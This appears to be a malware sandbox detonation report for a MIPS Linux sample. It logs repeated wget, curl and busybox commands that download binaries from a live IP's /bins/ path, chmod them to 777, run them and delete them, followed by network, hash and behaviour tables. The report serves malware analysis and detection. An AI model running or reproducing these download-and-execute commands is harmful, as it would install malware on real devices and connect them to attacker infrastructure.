[rm KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/usr/bin/wget
[wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/bin/chmod
[chmod 777 yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV
[./yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/bin/rm
[rm yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/usr/bin/wget
[wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/bin/chmod
[chmod 777 ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad
[./ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/bin/rm
[rm ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/usr/bin/wget
[wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/bin/chmod
[chmod 777 ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad
[./ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/bin/rm
[rm ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/usr/bin/wget
[wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/bin/chmod
[chmod 777 q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff
[./q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/bin/rm
[rm q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/usr/bin/wget
[wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/bin/chmod
[chmod 777 KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp
[./KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/bin/rm
[rm KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/usr/bin/wget
[wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/bin/chmod
[chmod 777 yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV
[./yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/bin/rm
[rm yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/usr/bin/wget
[wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/bin/chmod
[chmod 777 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3
[./3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/bin/rm
[rm 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/usr/bin/wget
[wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/bin/chmod
[chmod 777 aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl
[./aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/bin/rm
[rm aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/usr/bin/wget
[wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/bin/chmod
[chmod 777 c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV
[./c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/bin/rm
[rm c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/usr/bin/wget
[wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/bin/chmod
[chmod 777 fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC
[./fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/bin/rm
[rm fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/usr/bin/wget
[wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/bin/chmod
[chmod 777 l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe
[./l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/bin/rm
[rm l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/usr/bin/wget
[wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/bin/chmod
[chmod 777 vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB
[./vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/bin/rm
[rm vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/usr/bin/wget
[wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/bin/chmod
[chmod 777 mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr
[./mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/bin/rm
[rm mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/usr/bin/wget
[wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/bin/chmod
[chmod 777 EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm
[./EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/bin/rm
[rm EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/usr/bin/wget
[wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/bin/chmod
[chmod 777 Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr
[./Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/bin/rm
[rm Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/usr/bin/wget
[wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/bin/chmod
[chmod 777 PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC
[./PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/bin/rm
[rm PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-25 01:17
Reported
2024-10-25 01:20
Platform
debian9-mipsel-20240611-en
Max time kernel
80s
Max time network
82s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC | /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC | N/A |
| N/A | /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe | /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe | N/A |
| N/A | /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB | /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB | N/A |
| N/A | /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 | /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 | N/A |
| N/A | /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl | /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl | N/A |
| N/A | /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV | /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV | N/A |
| N/A | /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr | /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr | N/A |
| N/A | /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr | /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr | N/A |
| N/A | /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC | /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC | N/A |
| N/A | /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm | /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm | N/A |
| N/A | /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff | /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff | N/A |
| N/A | /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp | /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp | N/A |
| N/A | /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV | /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV | N/A |
| N/A | /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad | /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad | N/A |
| N/A | /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad | /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad | N/A |
| N/A | /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff | /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff | N/A |
| N/A | /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp | /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp | N/A |
| N/A | /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV | /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV | N/A |
| N/A | /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 | /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 | N/A |
| N/A | /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl | /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl | N/A |
| N/A | /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV | /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV | N/A |
| N/A | /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC | /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC | N/A |
| N/A | /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe | /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe | N/A |
| N/A | /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB | /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB | N/A |
| N/A | /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr | /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr | N/A |
| N/A | /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm | /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm | N/A |
| N/A | /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr | /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr | N/A |
| N/A | /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC | /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB | /usr/bin/curl | N/A |
